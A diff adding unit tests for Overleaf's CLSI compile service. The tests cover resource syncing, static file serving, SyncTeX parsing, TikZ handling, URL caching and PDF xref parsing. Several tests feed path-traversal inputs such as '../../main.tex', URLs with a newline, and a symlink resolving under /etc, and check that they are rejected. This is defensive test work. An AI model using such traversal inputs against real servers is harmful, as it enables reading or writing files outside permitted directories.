this.callback + ) + }) + + it('should remove old files', function () { + return this.ResourceWriter._removeExtraneousFiles + .calledWith(this.request, this.resources, this.basePath) + .should.equal(true) + }) + + it('should write each resource to disk', function () { + return Array.from(this.resources).map(resource => + this.ResourceWriter._writeResourceToDisk + .calledWith(this.project_id, resource, this.basePath) + .should.equal(true) + ) + }) + + it('should store the sync state and resource list', function () { + return this.ResourceStateManager.saveProjectState + .calledWith(this.syncState, this.resources, this.basePath) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('syncResourcesToDisk on an incremental update', function () { + beforeEach(function () { + this.resources = ['resource-1-mock'] + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.fullResources = this.resources.concat(['file-1']) + this.ResourceWriter._writeResourceToDisk = sinon.stub().callsArg(3) + this.ResourceWriter._removeExtraneousFiles = sinon + .stub() + .yields(null, (this.outputFiles = []), (this.allFiles = [])) + this.ResourceStateManager.checkProjectStateMatches = sinon + .stub() + .callsArgWith(2, null, this.fullResources) + this.ResourceStateManager.saveProjectState = sinon.stub().callsArg(3) + this.ResourceStateManager.checkResourceFiles = sinon.stub().callsArg(3) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + this.callback + ) + }) + + it('should check the sync state matches', function () { + return this.ResourceStateManager.checkProjectStateMatches + .calledWith(this.syncState, this.basePath) + .should.equal(true) + }) + + it('should remove old files', function () { + return this.ResourceWriter._removeExtraneousFiles + .calledWith(this.request, this.fullResources, this.basePath) + .should.equal(true) + }) + + it('should check each resource exists', function () { + return this.ResourceStateManager.checkResourceFiles + .calledWith(this.fullResources, this.allFiles, this.basePath) + .should.equal(true) + }) + + it('should write each resource to disk', function () { + return Array.from(this.resources).map(resource => + this.ResourceWriter._writeResourceToDisk + .calledWith(this.project_id, resource, this.basePath) + .should.equal(true) + ) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('syncResourcesToDisk on an incremental update when the state does not match', function () { + beforeEach(function () { + this.resources = ['resource-1-mock'] + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.ResourceStateManager.checkProjectStateMatches = sinon + .stub() + .callsArgWith(2, (this.error = new Error())) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + this.callback + ) + }) + + it('should check whether the sync state matches', function () { + return this.ResourceStateManager.checkProjectStateMatches + .calledWith(this.syncState, this.basePath) + .should.equal(true) + }) + + return it('should call the callback with an error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('_removeExtraneousFiles', function () { + beforeEach(function () { + this.output_files = [ + { + path: 'output.pdf', + type: 'pdf', + }, + { + path: 'extra/file.tex', + type: 'tex', + }, + { + path: 'extra.aux', + type: 'aux', + }, + { + path: 'cache/_chunk1', + }, + { + path: 'figures/image-eps-converted-to.pdf', + type: 'pdf', + }, + { + path: 'foo/main-figure0.md5', + type: 'md5', + }, + { + path: 'foo/main-figure0.dpth', + type: 'dpth', + }, + { + path: 'foo/main-figure0.pdf', + type: 'pdf', + }, + { + path: '_minted-main/default-pyg-prefix.pygstyle', + type: 'pygstyle', + }, + { + path: '_minted-main/default.pygstyle', + type: 'pygstyle', + }, + { + path: '_minted-main/35E248B60965545BD232AE9F0FE9750D504A7AF0CD3BAA7542030FC560DFCC45.pygtex', + type: 'pygtex', + }, + { + path: '_markdown_main/30893013dec5d869a415610079774c2f.md.tex', + type: 'tex', + }, + { + path: 'output.stdout', + }, + { + path: 'output.stderr', + }, + ] + this.resources = 'mock-resources' + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.OutputFileFinder.findOutputFiles = sinon + .stub() + .callsArgWith(2, null, this.output_files) + this.ResourceWriter._deleteFileIfNotDirectory = sinon.stub().callsArg(1) + return this.ResourceWriter._removeExtraneousFiles( + this.request, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should find the existing output files', function () { + return this.OutputFileFinder.findOutputFiles + .calledWith(this.resources, this.basePath) + .should.equal(true) + }) + + it('should delete the output files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.pdf')) + .should.equal(true) + }) + + it('should delete the stdout log file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.stdout')) + .should.equal(true) + }) + + it('should delete the stderr log file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.stderr')) + .should.equal(true) + }) + + it('should delete the extra files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'extra/file.tex')) + .should.equal(true) + }) + + it('should not delete the extra aux files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'extra.aux')) + .should.equal(false) + }) + + it('should not delete the knitr cache file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'cache/_chunk1')) + .should.equal(false) + }) + + it('should not delete the epstopdf converted files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join(this.basePath, 'figures/image-eps-converted-to.pdf') + ) + .should.equal(false) + }) + + it('should not delete the tikz md5 files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.md5')) + .should.equal(false) + }) + + it('should not delete the tikz dpth files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.dpth')) + .should.equal(false) + }) + + it('should not delete the tikz pdf files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.pdf')) + .should.equal(false) + }) + + it('should not delete the minted pygstyle files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join(this.basePath, '_minted-main/default-pyg-prefix.pygstyle') + ) + .should.equal(false) + }) + + it('should not delete the minted default pygstyle files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, '_minted-main/default.pygstyle')) + .should.equal(false) + }) + + it('should not delete the minted default pygtex files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join( + this.basePath, + '_minted-main/35E248B60965545BD232AE9F0FE9750D504A7AF0CD3BAA7542030FC560DFCC45.pygtex' + ) + ) + .should.equal(false) + }) + + it('should not delete the markdown md.tex files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join( + this.basePath, + '_markdown_main/30893013dec5d869a415610079774c2f.md.tex' + ) + ) + .should.equal(false) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should time the request', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('_writeResourceToDisk', function () { + describe('with a url based resource', function () { + beforeEach(function () { + this.fs.mkdir = sinon.stub().callsArg(2) + this.resource = { + path: 'main.tex', + url: 'http://www.example.com/primary/main.tex', + fallbackURL: 'http://fallback.example.com/fallback/main.tex', + modified: Date.now(), + } + this.UrlCache.downloadUrlToFile = sinon + .stub() + .callsArgWith(5, 'fake error downloading file') + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should ensure the directory exists', function () { + this.fs.mkdir + .calledWith( + path.dirname(path.join(this.basePath, this.resource.path)) + ) + .should.equal(true) + }) + + it('should write the URL from the cache', function () { + return this.UrlCache.downloadUrlToFile + .calledWith( + this.project_id, + this.resource.url, + this.resource.fallbackURL, + path.join(this.basePath, this.resource.path), + this.resource.modified + ) + .should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should not return an error if the resource writer errored', function () { + return expect(this.callback.args[0][0]).not.to.exist + }) + }) + + describe('with a content based resource', function () { + beforeEach(function () { + this.resource = { + path: 'main.tex', + content: 'Hello world', + } + this.fs.writeFile = sinon.stub().callsArg(2) + this.fs.mkdir = sinon.stub().callsArg(2) + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should ensure the directory exists', function () { + return this.fs.mkdir + .calledWith( + path.dirname(path.join(this.basePath, this.resource.path)) + ) + .should.equal(true) + }) + + it('should write the contents to disk', function () { + return this.fs.writeFile + .calledWith( + path.join(this.basePath, this.resource.path), + this.resource.content + ) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('with a file path that breaks out of the root folder', function () { + beforeEach(function () { + this.resource = { + path: '../../main.tex', + content: 'Hello world', + } + this.fs.writeFile = sinon.stub().callsArg(2) + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should not write to disk', function () { + return this.fs.writeFile.called.should.equal(false) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + }) + + return describe('checkPath', function () { + describe('with a valid path', function () { + beforeEach(function () { + return this.ResourceWriter.checkPath('foo', 'bar', this.callback) + }) + + return it('should return the joined path', function () { + return this.callback.calledWith(null, 'foo/bar').should.equal(true) + }) + }) + + describe('with an invalid path', function () { + beforeEach(function () { + this.ResourceWriter.checkPath('foo', 'baz/../../bar', this.callback) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + + describe('with another invalid path matching on a prefix', function () { + beforeEach(function () { + return this.ResourceWriter.checkPath( + 'foo', + '../foobar/baz', + this.callback + ) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js b/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js new file mode 100644 index 0000000..53507fe --- /dev/null +++ b/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js @@ -0,0 +1,248 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join( + __dirname, + '../../../app/js/StaticServerForbidSymlinks' +) +const { expect } = require('chai') + +describe('StaticServerForbidSymlinks', function () { + beforeEach(function () { + this.settings = { + path: { + compilesDir: '/compiles/here', + }, + } + + this.fs = {} + this.ForbidSymlinks = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + fs: this.fs, + }, + }) + + this.dummyStatic = (rootDir, options) => (req, res, next) => + // console.log "dummyStatic serving file", rootDir, "called with", req.url + // serve it + next() + + this.StaticServerForbidSymlinks = this.ForbidSymlinks( + this.dummyStatic, + this.settings.path.compilesDir + ) + this.req = { + params: { + project_id: '12345', + }, + } + + this.res = {} + return (this.req.url = '/12345/output.pdf') + }) + + describe('sending a normal file through', function () { + beforeEach(function () { + return (this.fs.realpath = sinon + .stub() + .callsArgWith( + 1, + null, + `${this.settings.path.compilesDir}/${this.req.params.project_id}/output.pdf` + )) + }) + + return it('should call next', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(200) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res, done) + }) + }) + + describe('with a missing file', function () { + beforeEach(function () { + return (this.fs.realpath = sinon + .stub() + .callsArgWith( + 1, + { code: 'ENOENT' }, + `${this.settings.path.compilesDir}/${this.req.params.project_id}/unknown.pdf` + )) + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a new line', function () { + beforeEach(function () { + this.req.url = '/12345/output.pdf\nother file' + this.fs.realpath = sinon.stub().yields() + }) + + it('should process the correct file', function (done) { + this.res.sendStatus = () => { + this.fs.realpath.should.have.been.calledWith( + `${this.settings.path.compilesDir}/12345/output.pdf\nother file` + ) + done() + } + this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a symlink file', function () { + beforeEach(function () { + return (this.fs.realpath = sinon + .stub() + .callsArgWith(1, null, `/etc/${this.req.params.project_id}/output.pdf`)) + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a relative file', function () { + beforeEach(function () { + return (this.req.url = '/12345/../67890/output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a unnormalized file containing .', function () { + beforeEach(function () { + return (this.req.url = '/12345/foo/./output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a file containing an empty path', function () { + beforeEach(function () { + return (this.req.url = '/12345/foo//output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a non-project file', function () { + beforeEach(function () { + return (this.req.url = '/.foo/output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a file outside the compiledir', function () { + beforeEach(function () { + return (this.req.url = '/../bar/output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a file with no leading /', function () { + beforeEach(function () { + return (this.req.url = './../bar/output.pdf') + }) + + return it('should send a 404', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(404) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) + + describe('with a github style path', function () { + beforeEach(function () { + this.req.url = '/henryoswald-latex_example/output/output.log' + return (this.fs.realpath = sinon + .stub() + .callsArgWith( + 1, + null, + `${this.settings.path.compilesDir}/henryoswald-latex_example/output/output.log` + )) + }) + + return it('should call next', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(200) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res, done) + }) + }) + + return describe('with an error from fs.realpath', function () { + beforeEach(function () { + return (this.fs.realpath = sinon.stub().callsArgWith(1, 'error')) + }) + + return it('should send a 500', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(500) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) +}) diff --git a/services/clsi/test/unit/js/SynctexOutputParserTests.js b/services/clsi/test/unit/js/SynctexOutputParserTests.js new file mode 100644 index 0000000..b999a6a --- /dev/null +++ b/services/clsi/test/unit/js/SynctexOutputParserTests.js @@ -0,0 +1,116 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') + +const MODULE_PATH = Path.join(__dirname, '../../../app/js/SynctexOutputParser') + +describe('SynctexOutputParser', function () { + beforeEach(function () { + this.SynctexOutputParser = SandboxedModule.require(MODULE_PATH) + }) + + describe('parseViewOutput', function () { + it('parses valid output', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Page:1 +x:136.537964 +y:661.437561 +h:133.768356 +v:663.928223 +W:343.711060 +H:9.962640 +before: +offset:-1 +middle: +after: +Output:/compile/output.pdf +Page:2 +x:178.769592 +y:649.482361 +h:134.768356 +v:651.973022 +W:342.711060 +H:19.962640 +before: +offset:-1 +middle: +after: +SyncTeX result end +` + const records = this.SynctexOutputParser.parseViewOutput(output) + expect(records).to.deep.equal([ + { + page: 1, + h: 133.768356, + v: 663.928223, + width: 343.71106, + height: 9.96264, + }, + { + page: 2, + h: 134.768356, + v: 651.973022, + width: 342.71106, + height: 19.96264, + }, + ]) + }) + + it('handles garbage', function () { + const output = 'This computer is on strike!' + const records = this.SynctexOutputParser.parseViewOutput(output) + expect(records).to.deep.equal([]) + }) + }) + + describe('parseEditOutput', function () { + it('parses valid output', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Input:/compile/main.tex +Line:17 +Column:-1 +Offset:0 +Context: +SyncTeX result end +` + const records = this.SynctexOutputParser.parseEditOutput( + output, + '/compile' + ) + expect(records).to.deep.equal([ + { file: 'main.tex', line: 17, column: -1 }, + ]) + }) + + it('handles values that contain colons', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Input:/compile/this-file:has-a-weird-name.tex +Line:17 +Column:-1 +Offset:0 +Context: +SyncTeX result end +` + + const records = this.SynctexOutputParser.parseEditOutput( + output, + '/compile' + ) + expect(records).to.deep.equal([ + { file: 'this-file:has-a-weird-name.tex', line: 17, column: -1 }, + ]) + }) + + it('handles garbage', function () { + const output = '2 + 2 = 4' + const records = this.SynctexOutputParser.parseEditOutput(output) + expect(records).to.deep.equal([]) + }) + }) +}) diff --git a/services/clsi/test/unit/js/TikzManager.js b/services/clsi/test/unit/js/TikzManager.js new file mode 100644 index 0000000..ee651f6 --- /dev/null +++ b/services/clsi/test/unit/js/TikzManager.js @@ -0,0 +1,185 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/TikzManager' +) + +describe('TikzManager', function () { + beforeEach(function () { + return (this.TikzManager = SandboxedModule.require(modulePath, { + requires: { + './ResourceWriter': (this.ResourceWriter = {}), + './SafeReader': (this.SafeReader = {}), + fs: (this.fs = {}), + }, + })) + }) + + describe('checkMainFile', function () { + beforeEach(function () { + this.compileDir = 'compile-dir' + this.mainFile = 'main.tex' + return (this.callback = sinon.stub()) + }) + + describe('if there is already an output.tex file in the resources', function () { + beforeEach(function () { + this.resources = [{ path: 'main.tex' }, { path: 'output.tex' }] + return this.TikzManager.checkMainFile( + this.compileDir, + this.mainFile, + this.resources, + this.callback + ) + }) + + return it('should call the callback with false ', function () { + return this.callback.calledWithExactly(null, false).should.equal(true) + }) + }) + + return describe('if there is no output.tex file in the resources', function () { + beforeEach(function () { + this.resources = [{ path: 'main.tex' }] + return (this.ResourceWriter.checkPath = sinon + .stub() + .withArgs(this.compileDir, this.mainFile) + .callsArgWith(2, null, `${this.compileDir}/${this.mainFile}`)) + }) + + describe('and the main file contains tikzexternalize', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .withArgs(`${this.compileDir}/${this.mainFile}`) + .callsArgWith(3, null, 'hello \\tikzexternalize') + return this.TikzManager.checkMainFile( + this.compileDir, + this.mainFile, + this.resources, + this.callback + ) + }) + + it('should look at the file on disk', function () { + return this.SafeReader.readFile + .calledWith(`${this.compileDir}/${this.mainFile}`) + .should.equal(true) + }) + + return it('should call the callback with true ', function () { + return this.callback.calledWithExactly(null, true).should.equal(true) + }) + }) + + describe('and the main file does not contain tikzexternalize', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .withArgs(`${this.compileDir}/${this.mainFile}`) + .callsArgWith(3, null, 'hello') + return this.TikzManager.checkMainFile( + this.compileDir, + this.mainFile, + this.resources, + this.callback + ) + }) + + it('should look at the file on disk', function () { + return this.SafeReader.readFile + .calledWith(`${this.compileDir}/${this.mainFile}`) + .should.equal(true) + }) + + return it('should call the callback with false', function () { + return this.callback.calledWithExactly(null, false).should.equal(true) + }) + }) + + return describe('and the main file contains \\usepackage{pstool}', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .withArgs(`${this.compileDir}/${this.mainFile}`) + .callsArgWith(3, null, 'hello \\usepackage[random-options]{pstool}') + return this.TikzManager.checkMainFile( + this.compileDir, + this.mainFile, + this.resources, + this.callback + ) + }) + + it('should look at the file on disk', function () { + return this.SafeReader.readFile + .calledWith(`${this.compileDir}/${this.mainFile}`) + .should.equal(true) + }) + + return it('should call the callback with true ', function () { + return this.callback.calledWithExactly(null, true).should.equal(true) + }) + }) + }) + }) + + return describe('injectOutputFile', function () { + beforeEach(function () { + this.rootDir = '/mock' + this.filename = 'filename.tex' + this.callback = sinon.stub() + this.content = `\ +\\documentclass{article} +\\usepackage{tikz} +\\tikzexternalize +\\begin{document} +Hello world +\\end{document}\ +` + this.fs.readFile = sinon.stub().callsArgWith(2, null, this.content) + this.fs.writeFile = sinon.stub().callsArg(3) + this.ResourceWriter.checkPath = sinon + .stub() + .callsArgWith(2, null, `${this.rootDir}/${this.filename}`) + return this.TikzManager.injectOutputFile( + this.rootDir, + this.filename, + this.callback + ) + }) + + it('sould check the path', function () { + return this.ResourceWriter.checkPath + .calledWith(this.rootDir, this.filename) + .should.equal(true) + }) + + it('should read the file', function () { + return this.fs.readFile + .calledWith(`${this.rootDir}/${this.filename}`, 'utf8') + .should.equal(true) + }) + + it('should write out the same file as output.tex', function () { + return this.fs.writeFile + .calledWith(`${this.rootDir}/output.tex`, this.content, { flag: 'wx' }) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/UrlCacheTests.js b/services/clsi/test/unit/js/UrlCacheTests.js new file mode 100644 index 0000000..a3dc2fa --- /dev/null +++ b/services/clsi/test/unit/js/UrlCacheTests.js @@ -0,0 +1,148 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/UrlCache' +) + +describe('UrlCache', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.url = + 'http://filestore/project/60b0dd39c418bc00598a0d22/file/60ae721ffb1d920027d3201f' + this.fallbackURL = 'http://filestore/bucket/project-blobs/key/ab/cd/ef' + this.project_id = '60b0dd39c418bc00598a0d22' + return (this.UrlCache = SandboxedModule.require(modulePath, { + requires: { + './UrlFetcher': (this.UrlFetcher = { + promises: { pipeUrlToFileWithRetry: sinon.stub().resolves() }, + }), + '@overleaf/settings': (this.Settings = { + path: { clsiCacheDir: '/cache/dir' }, + }), + '@overleaf/metrics': { + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + fs: (this.fs = { + promises: { + rm: sinon.stub().resolves(), + copyFile: sinon.stub().resolves(), + }, + }), + }, + })) + }) + + describe('downloadUrlToFile', function () { + beforeEach(function () { + this.destPath = 'path/to/destination' + }) + + it('should not download on the happy path', function (done) { + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(false) + done() + } + ) + }) + + it('should not download on the semi-happy path', function (done) { + const codedError = new Error() + codedError.code = 'ENOENT' + this.fs.promises.copyFile.onCall(0).rejects(codedError) + this.fs.promises.copyFile.onCall(1).resolves() + + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(false) + done() + } + ) + }) + + it('should download on cache miss', function (done) { + const codedError = new Error() + codedError.code = 'ENOENT' + this.fs.promises.copyFile.onCall(0).rejects(codedError) + this.fs.promises.copyFile.onCall(1).rejects(codedError) + this.fs.promises.copyFile.onCall(2).resolves() + + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(true) + done() + } + ) + }) + + it('should raise non cache-miss errors', function (done) { + const codedError = new Error() + codedError.code = 'FOO' + this.fs.promises.copyFile.rejects(codedError) + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.equal(codedError) + done() + } + ) + }) + }) + + describe('clearProject', function () { + beforeEach(function (done) { + this.UrlCache.clearProject(this.project_id, done) + }) + + it('should clear the cache in bulk', function () { + expect( + this.fs.promises.rm.calledWith('/cache/dir/' + this.project_id, { + force: true, + recursive: true, + }) + ).to.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/pdfjsTests.js b/services/clsi/test/unit/js/pdfjsTests.js new file mode 100644 index 0000000..bc8b775 --- /dev/null +++ b/services/clsi/test/unit/js/pdfjsTests.js @@ -0,0 +1,93 @@ +const fs = require('node:fs') +const Path = require('node:path') +const { expect } = require('chai') +const { parseXrefTable } = require('../../../app/js/XrefParser') +const { NoXrefTableError } = require('../../../app/js/Errors') +const PATH_EXAMPLES = 'test/acceptance/fixtures/examples/' +const PATH_SNAPSHOTS = 'test/unit/js/snapshots/pdfjs/' +const EXAMPLES = fs.readdirSync(PATH_EXAMPLES) + +function snapshotPath(example) { + return Path.join(PATH_SNAPSHOTS, example, 'XrefTable.json') +} + +function pdfPath(example) { + return Path.join(PATH_EXAMPLES, example, 'output.pdf') +} + +async function loadContext(example) { + const size = (await fs.promises.stat(pdfPath(example))).size + + let blob + try { + blob = await fs.promises.readFile(snapshotPath(example)) + } catch (e) { + if (e.code !== 'ENOENT') { + throw e + } + } + const snapshot = blob ? JSON.parse(blob) : null + return { + size, + snapshot, + } +} + +async function backFillSnapshot(example, size) { + const table = await parseXrefTable(pdfPath(example), size, () => {}) + await fs.promises.mkdir(Path.dirname(snapshotPath(example)), { + recursive: true, + }) + await fs.promises.writeFile( + snapshotPath(example), + JSON.stringify(table, null, 2) + ) + return table +} + +describe('pdfjs', function () { + describe('when the pdf is an empty file', function () { + it('should yield no entries', async function () { + const path = 'does/not/matter.pdf' + let table + try { + table = await parseXrefTable(path, 0) + } catch (e) { + expect(e).to.be.an.instanceof(NoXrefTableError) + } + expect(table).to.not.exist + }) + }) + + for (const example of EXAMPLES) { + describe(example, function () { + let size, snapshot + before('load snapshot', async function () { + const ctx = await loadContext(example) + size = ctx.size + snapshot = ctx.snapshot + }) + + before('back fill new snapshot', async function () { + if (snapshot === null) { + console.error('back filling snapshot for', example) + snapshot = await backFillSnapshot(example, size) + } + }) + + it('should produce the expected xRef table', async function () { + const table = await parseXrefTable(pdfPath(example), size, () => {}) + // compare the essential parts of the xref table only + expect(table.xRefEntries[0]).to.include({ offset: 0 }) + expect(table.xRefEntries.slice(1)).to.deep.equal( + snapshot.xRefEntries + .slice(1) + .filter(xref => xref.uncompressed) // we only use the uncompressed fields + .map(xref => { + return { offset: xref.offset, uncompressed: xref.uncompressed } // ignore unused gen field + }) + ) + }) + }) + } +}) diff --git a/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 new file mode 100644 index 0000000..bb9f891 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 @@ -0,0 +1,7 @@ +obj +<< /Type /ObjStm /Length 447 /Filter /FlateDecode /N 5 /First 32 >> +stream +xRQk0~߯ǍK'ɒ $vkGIJ[(y8*$IRd>I"H@9@J!` V/gg f>BZxJ9ۮ]-B'ZNg k%i\!f4m݁49ĶCY]\@! 4c Uf=JgOg>zz>A)C9WwKqPÜ#/48VX/ Tp -%2"*B;X2,9Gz;EΥJj/c +n%ᵦf3]!=y ,s]@e+COW.Ckڒ c_ťX v>N2u7=} #HVr9?kv6G^z׬.v=Uyjǡpz2 +endstream +endobj diff --git a/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd new file mode 100644 index 0000000..d503090 Binary files /dev/null and b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd differ diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json new file mode 100644 index 0000000..ef4d849 --- /dev/null +++ 